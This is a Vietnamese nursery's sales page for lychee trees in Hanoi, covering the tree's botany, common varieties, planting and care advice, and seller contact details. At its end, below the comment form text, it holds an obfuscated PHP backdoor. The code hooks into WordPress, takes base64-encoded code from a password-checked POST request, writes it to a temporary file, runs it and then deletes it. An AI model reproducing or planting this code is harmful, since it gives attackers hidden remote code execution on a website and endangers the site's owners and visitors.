Địa chỉ bán cây vải ở Hà Nội

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Vải chính là loại quả quý, thơm ngon, cực kỳ bổ dưỡng mà còn mang đến những giá trị kinh tế cao, tốt cho não bộ và giúp điều trị những căn bệnh về đường ruột cực kì tốt. Cây vải không chỉ mang đến những thứ quả ngon ngọt, bên cạnh đó còn mang đến bóng mát, mà còn là nguồn cung cấp dinh dưỡng cho nghề nuôi ong tạo ra những giọt mật ngon ngọt chất lượng . Vườn Cây Hòa Bình chính là địa chỉ bán cây vải ở Hà Nội để bạn có thể dễ dàng lựa chọn cho mình một giống cây vải khỏe mạnh, tươi tốt.

 

Địa chỉ bán cây vải ở Hà Nội
Địa chỉ bán cây vải ở Hà Nội

Tổng quan về cây vải

 

Cây vải có tên khoa học là Litchi chinensis và tên gọi khác là Lệ Chi, cây vải thuộc họ Sapindaceae( Bồ hòn) 

 

Cây vải thuộc loại cây ăn quả nhiệt đới thân gỗ, có xuất xứ từ Trung Quốc, phân bổ trải dài về phía nam Trung Quốc đến Indonesia về phía đông Philippin.

 

Đặc điểm của cây vải

 

Cây vải thuộc loài thân gỗ có kích thước trung bình, khi trưởng thành cây vải có chiều cao lên tới 15 đến 20m. 

 

Lá vải mọc so le có hình lông chim, dài 15 – 25cm và có từ 2 đến 8 chét lá dài khoảng từ 5 đến 10cm. Những lá non có màu đỏ đồng, Khi lớn, lá mọc to và dàn chuyển sang màu xanh lục 

 

Hoa vải có màu trắng ánh vàng hoặc trắng ánh xanh lục mọc thành từng chùm hoa dài tới 30cm.

 

=> Xem thêm: Cây giáng hương

 

=> Xem thêm: Bán cây xoài công trình 2020

 

 

Địa chỉ bán cây vải ở Hà Nội
Địa chỉ bán cây vải ở Hà Nội

 

Quả vải thuộc loại quả hạch hình cầu hơi thuôn dài khoảng 4cm và có đường kính khoảng 3cm. Lớp vỏ sần sùi màu đỏ thẫm khi chín không ăn được. Bên trong chứa lớp cùi màu trắng đục, ăn thơm ngọt rất giàu vitamin C và có kết cấu tương tự như quả nho. Ở giữa chính là hạt màu nâu có chứa độc tính nhẹ thế nên được khuyến cáo không nên ăn. 

 

Bạn sẽ thu được vụ quả đầu tiên vào tháng 6 đối với những nơi xa xích đạo sẽ cho quả vào tháng 10 sau khi đã nở hoa được 100 ngày.

 

Các giống vải phổ biến hiện nay

 

Vải chua: Đây là giống vải được trồng phổ biến khá lâu tại Việt Nam, vải thường có vị chua, hạt to, chất lượng không đều thế nên hiện nay đã không còn được ưa chuộng và phát triển.

 

Vải nhỡ: Đây là một giống vải lai và là hiện tượng biến dị của vải thiều khi gieo trồng bằng hạt. Đặc điểm quả của giống vải này thường to ngon hơn vải chua nhưng kém vải thiều, thời gian quả chín sau vải chua, được trồng rải rác tại vùng đồi Trung du.

 

Địa chỉ bán cây vải ở Hà Nội
Địa chỉ bán cây vải ở Hà Nội

 

Vải thiều Thanh Hà: Được chọn lọc và nhân giống mạnh mẽ tại Thanh Hà – Hải Dương vào 100 năm trước đây. Những quả vải mang đến chất lượng tốt và năng suất cao nên được trồng phổ biến tại các vùng đồng bằng và Trung du Bắc bộ.

 

Quả có mùi thơm, thịt ngon, hơi nhão. Khi câu vải thiều đạt đến độ tuổi 10 năm, cây sẽ cho năng suất quả và hoa ổn định. Nếu như với điều kiện trồng cây vải thiều trên những vùng trung du, bạn cần phải chăm sóc cây thật tốt và bổ sung dinh dưỡng cho cây nhất là bón phân lân và phân hữu cơ đều đặn để cây có năng suất cao. 

 

Vải Xuân Đỉnh: Được trồng tại Xuân Đỉnh có đặc điểm tương đối giống với vải Thanh Hà, nhưng quả to hơn, vỏ màu đỏ thắm, và thịt rất ngon.

 

Cách chăm sóc cây vải sao cho chuẩn xác

 

Đất trồng phù hợp đó chính là điều kiện đầu tiên để bạn có được một cây vải khỏe mạnh. Cây vải không kén đất, nhưng bạn cần phải đáp ứng điều kiện đất trồng có hệ thống thoát nước tốt., tầng đất dày. Nếu như bạn trồng bằng phương pháp chiết cành, bộ phận rễ kém bám đất, bạn cần phải đảm bảo có độ ẩm cần thiết và giữ cố định cây để cây vải không bị lung lay gốc. Đối với những nơi đồi núi, nên chọn những vùng đất có độ dốc thấp để trồng cây vải, nên chọn những đường đồng mức để có băng cây chống xói mòn.

 

Thời vụ trồng cây vải thường vào tháng 3 đến tháng 4 đối với mùa xuân, tháng 8 đến tháng 9 đối với mùa thu.

 

Bón phân lót: Bạn hãy tạo hỗn hợp đất trồng với phân lân + cỏ + rác + phân xanh với 20 – 30kg phân chuồng sau đó lấp đầy miệng hố trước một tháng rồi mới tiến hành trồng.

 

Địa chỉ bán cây vải ở Hà Nội
Địa chỉ bán cây vải ở Hà Nội

 

 

Tưới nước thường xuyên cho cây để cây có độ ẩm cần thiết để cây nhanh chóng bén rễ. 

 

Bên cạnh đó chú ý phòng ngừa những sâu bệnh có hại cho cây như: Bọ xít, sâu đục cành, nhện 4 chân,.. bằng những dung dịch thuốc trừ sâu như Ortos, Dipterex, polyetylen để cây có thể phát triển khỏe mạnh.

 

Vườn Cây Hòa Bình chuyên cung cấp cây vải Hà Nội

 

Vườn Cây Hòa Bình chính là đơn vị cung cấp cây vải Hà Nội với giống khỏe mạnh, quả ngon ngọt. Chúng tôi chuyên phân phối những giống vải nổi tiếng như vải thiều, vải Xuân Đỉnh, Vải nhỡ,… cao lớn thích hợp sử dụng làm cây công trình cho bóng mát, tạo cảnh quan cực kỳ hữu dụng. Bên cạnh đó, còn mang lại hiệu quả kinh tế cực kì tốt. 

 

Bạn có thể dễ dàng lựa chọn những loại cây cảnh đẹp, khỏe mạnh đa dạng với giá thành tốt nhất thị trường. 

 

Để biết thêm thông tin chi tiết, quý khách hàng vui lòng liên hệ:

 

– Hotline: 0962.376.560

– Bán hàng: 0962.376.560

– Nguyễn Trường Giang

– Địa chỉ: Cầu Mai Lĩnh, Biên giang , Hà Đông ,Hà Nội

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}